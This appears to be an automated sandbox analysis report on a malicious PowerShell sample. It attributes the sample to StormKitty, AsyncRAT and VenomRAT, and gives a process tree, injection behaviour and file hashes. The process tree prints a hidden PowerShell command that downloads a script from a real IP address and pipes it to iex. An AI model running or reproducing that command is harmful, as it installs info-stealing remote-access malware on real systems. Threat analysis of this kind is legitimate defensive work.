Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02/01/2025, 18:15
Static task
static1
Behavioral task
behavioral1
Sample
wrcaf.ps1
Resource
win7-20240903-en
General
-
Target
wrcaf.ps1
-
Size
2KB
-
MD5
898d5189a1dc57fa7a80b4d986ef77c9
-
SHA1
aeb3667119b2fda564f498d26c04758caf44b1c5
-
SHA256
61270d6564a80eff42a00bf542fc79224949fb27df8c1d6d3acbaa6000fc8577
-
SHA512
d8cc4add28939f7072fad657b863f0e49ae420bae27a952db499f66caebbda79ff29a552f12ef0cd2cbd1d32003c0db940f0a16bceca196cd3684472c0c2e8c8
Malware Config
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/2476-58-0x0000000000400000-0x0000000000704000-memory.dmp family_stormkitty -
Stormkitty family
-
resource yara_rule behavioral2/memory/2476-58-0x0000000000400000-0x0000000000704000-memory.dmp VenomRAT -
Venomrat family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 7 3960 powershell.exe 16 372 powershell.exe -
pid Process 3960 powershell.exe 372 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1624 Package.exe -
Loads dropped DLL 1 IoCs
pid Process 1624 Package.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 372 set thread context of 2476 372 powershell.exe 93 -
Program crash 1 IoCs
pid pid_target Process procid_target 2740 1624 WerFault.exe 86 -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Package.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3960 powershell.exe 3960 powershell.exe 3960 powershell.exe 3960 powershell.exe 372 powershell.exe 372 powershell.exe 2476 RegAsm.exe 2476 RegAsm.exe 2476 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3960 powershell.exe Token: SeDebugPrivilege 372 powershell.exe Token: SeDebugPrivilege 2476 RegAsm.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1624 Package.exe 1624 Package.exe 1624 Package.exe 2476 RegAsm.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 3960 wrote to memory of 2288 3960 powershell.exe 85 PID 3960 wrote to memory of 2288 3960 powershell.exe 85 PID 2288 wrote to memory of 1624 2288 cmd.exe 86 PID 2288 wrote to memory of 1624 2288 cmd.exe 86 PID 2288 wrote to memory of 1624 2288 cmd.exe 86 PID 1624 wrote to memory of 212 1624 Package.exe 87 PID 1624 wrote to memory of 212 1624 Package.exe 87 PID 1624 wrote to memory of 212 1624 Package.exe 87 PID 212 wrote to memory of 372 212 cmd.exe 89 PID 212 wrote to memory of 372 212 cmd.exe 89 PID 212 wrote to memory of 372 212 cmd.exe 89 PID 372 wrote to memory of 1956 372 powershell.exe 91 PID 372 wrote to memory of 1956 372 powershell.exe 91 PID 372 wrote to memory of 1956 372 powershell.exe 91 PID 1956 wrote to memory of 4712 1956 csc.exe 92 PID 1956 wrote to memory of 4712 1956 csc.exe 92 PID 1956 wrote to memory of 4712 1956 csc.exe 92 PID 372 wrote to memory of 2476 372 powershell.exe 93 PID 372 wrote to memory of 2476 372 powershell.exe 93 PID 372 wrote to memory of 2476 372 powershell.exe 93 PID 372 wrote to memory of 2476 372 powershell.exe 93 PID 372 wrote to memory of 2476 372 powershell.exe 93 PID 372 wrote to memory of 2476 372 powershell.exe 93 PID 372 wrote to memory of 2476 372 powershell.exe 93 PID 372 wrote to memory of 2476 372 powershell.exe 93
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\wrcaf.ps11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\Temp\Package.exeC:\Windows\Temp\Package.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\35gt05ar\35gt05ar.cmdline"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4E6.tmp" "c:\Users\Admin\AppData\Local\Temp\35gt05ar\CSC679C3671FB4043C58A475C966723ACE.TMP"7⤵
- System Location Discovery: System Language Discovery
PID:4712
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2476
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 1804⤵
- Program crash
PID:2740
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1624 -ip 16241⤵PID:4768
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a9b53645ac136a73f0af2f791f716efd
SHA19917c3c61b029440dacd1b93a80700ce4afdfae8
SHA256e9945e3f08483ef253189f405ad6ed0360649884e7ff534bbb233ba93fdd71d6
SHA512a10d2e89faf9f76242edf38c88af522c7739402e158b7202566442bcbe78c84e7ff1c375a90c75bc396046e90a8a57dc24817a1a5ae524da148c1eef034962b9
-
Filesize
9KB
MD565a672c74ad66c1061c3b7231652d669
SHA10bdae78db22ce446a5edeb453454a461548201e1
SHA256d0cb17a34a1f430b2df8ea9d9ed1e9fcc6f10b95011b5b97f949485864c5fc92
SHA512a3610a403a625ed293004ec33cfd93b36e94ad5ec9214052a8c5c843b368b020529b29cf8c2064a1f79c29b9d61364f1f2f5a6e41d7a74e1ba069cfd5c431247
-
Filesize
1KB
MD57c4582d89b4263d0f435be4ac16a1c8c
SHA12ed23c54bd5acf5f2a82cec803c614f6cde698fd
SHA256b3c3b6d42280445b6a8eca4bf2db8d9d6af4eb30d62a2a0d492d2ca133b86add
SHA51208b16249dd455236448210a03a489fa997af7f007b91753d18607f842acf102b40c2cde490ee07c385e33fee31842bc4911cfcd639d769b4d89229cde4615ee7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
88KB
MD533ae2b9c3e710254fe2e2ce35ff8a7c8
SHA1109e32187254b27e04ef18bbe1b48fad42bca841
SHA2569c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68
SHA5122abe017e2f1d29fe789206d6483b9b33e7abd0871300d678eaba15e390d55c5e197d6cea6ea32dfdee5f65d082574adcc192a4fc0c9506bbba8ad7e957e12599
-
Filesize
201KB
MD52696d944ffbef69510b0c826446fd748
SHA1e4106861076981799719876019fe5224eac2655c
SHA256a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a
SHA512c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb
-
Filesize
10KB
MD53fa79decff8805745cea8116d9bb2643
SHA192343c5fa2c768b964ae3a4e9136e5d7193e8558
SHA256e6852a401b53a7af04d57aa1e4fc9621e3dffc1221534142316a27ae67e8f89c
SHA5125c2879e59fa6609e6e87f70c5237b250a906bf7dd13a343dac9e81635b1fc91ad9374e643a306b99503c52ce9bd56554a64aa132584c732d43ee39fb17305d78
-
Filesize
204B
MD51b69eca2bcd18284a0bc211f490092a9
SHA1850c0f528a76fdcb726c542838779dfb8088e42b
SHA2564956601a6ebe8a1216bf48cf167c143dac82b1cae85e7cf05d3a32d154ba3bec
SHA5129a27ccd4ef9ffa2a311777efcc1d653cabc45ff10f766de1119b7c11ddcdb621f824e57a178c2aca6fbce32da51962d8b54ebb0d5be3a95e828d47fcaf303d88
-
Filesize
652B
MD5b391632ace3fc2e57036c3a48db130e6
SHA12470cd06506790c2db182e94b2220c2c46d01287
SHA256abd8a11d584cee7fedbd01f9db665a20885aba82aa5c4d12649280c7f3e61d3c
SHA5122d034b712200b26e28a60be0e02f77599eca30f128e00e169894a1005387a18895cfff30218fd995201859585542a6fa65aebdd23cce5af25f672ac9b5fde02a